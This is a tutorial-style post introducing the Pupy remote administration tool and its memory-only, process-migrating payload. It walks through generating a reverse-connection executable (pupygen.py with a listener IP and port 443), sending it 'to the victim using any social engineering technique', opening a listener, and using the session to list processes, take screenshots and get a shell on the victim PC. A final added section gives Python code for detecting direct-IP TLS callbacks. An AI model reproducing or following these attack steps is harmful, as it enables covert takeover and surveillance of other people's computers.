Pupy is a remote administration tool with an embedded Python interpreter, allowing its modules to load Python packages from memory and transparently access remote Python objects. The payload is a reflective DLL and leaves no trace on disk.
· On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
· Pupy can reflectively migrate into other processes.
· Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
· Modules are quite simple to write and Pupy is easily extensible.
· Pupy uses rpyc, and a module can directly access Python objects on the remote client.
· We can also access remote objects interactively from the pupy shell, and even auto-completion of remote attributes works!
· The communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future.
· All the non-interactive modules can be dispatched on multiple hosts in one command.
· Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu).
· Modules can be executed as background jobs.
· Commands and scripts running on remote hosts are interruptible.
· Auto-completion and nice colored output :-)
· Command aliases can be defined in the config.

First, download pupy-master from here and unzip it on your PC.

Now run pip install rpyc in your terminal.

Now go to the pupy folder and type the following command to generate the payload.

./pupygen.py 192.168.1.6 -p 443 -t exe_x86 -o fb.exe

After the malicious exe file is successfully generated, it will be stored on your local computer. Now send the fb.exe file to the victim using any social engineering technique.

Now go to the pupy folder and type the following command to set up a listener to handle the reverse connection.

./pupysh.py

Now open the pupy shell. It will show the message session 1 opened.

Now type the command sessions to see active sessions. Type the ps command to see the running processes.

Type the command list_modules to see all available modules.

Type run screenshot to save screenshots into an image file.

Now use the run interactive shell command to get control of the victim PC.
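
Because the payload above is generated with a literal IP and port, its SSL reverse connection goes to port 443 without any DNS lookup, which is one thing endpoint telemetry can key on. The following is an added example, not part of the original post or of Pupy: the event records, field names and the find_direct_ip_tls helper are constructed for illustration, and treating a migrated payload as a connection from the host process is an assumption.

```python
from collections import defaultdict

# Constructed, simplified Sysmon-style events (22 = DNS query, 3 = network
# connection). Field names, PIDs, paths and 203.0.113.10 are sample values;
# 192.168.1.6:443 is the listener address from the pupygen command above.
EVENTS = [
    {"id": 22, "pid": 4100, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "query": "example.org", "answers": ["203.0.113.10"]},
    {"id": 3, "pid": 4100, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 3, "pid": 5220, "image": r"C:\Users\alice\Downloads\fb.exe",
     "dst_ip": "192.168.1.6", "dst_port": 443},
    {"id": 3, "pid": 1200, "image": r"C:\Windows\explorer.exe",
     "dst_ip": "192.168.1.6", "dst_port": 443},
    {"id": 3, "pid": 6012, "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "192.168.1.1", "dst_port": 53},
]

# Directories an unprivileged user can normally write to (lower-cased).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")


def find_direct_ip_tls(events, port=443):
    """Flag connections to `port` whose destination IP was never returned by a
    DNS query from the same process. Severity is "high" when the image also
    runs from a user-writable path, "medium" otherwise (e.g. a payload that
    has migrated into an existing process)."""
    resolved = defaultdict(set)  # pid -> IPs that process has resolved so far
    hits = []
    for ev in events:  # events are assumed to be in time order
        if ev["id"] == 22:
            resolved[ev["pid"]].update(ev["answers"])
        elif ev["id"] == 3 and ev["dst_port"] == port:
            if ev["dst_ip"] in resolved[ev["pid"]]:
                continue  # destination came from a DNS answer: expected
            writable = any(p in ev["image"].lower() for p in USER_WRITABLE)
            severity = "high" if writable else "medium"
            hits.append((severity, ev["pid"], ev["image"], ev["dst_ip"]))
    return hits


if __name__ == "__main__":
    for severity, pid, image, ip in find_direct_ip_tls(EVENTS):
        print(f"[{severity}] pid={pid} {image} -> {ip}:443 with no DNS lookup")
```

In real telemetry the medium-severity results need an allowlist for software that legitimately connects to fixed IP addresses.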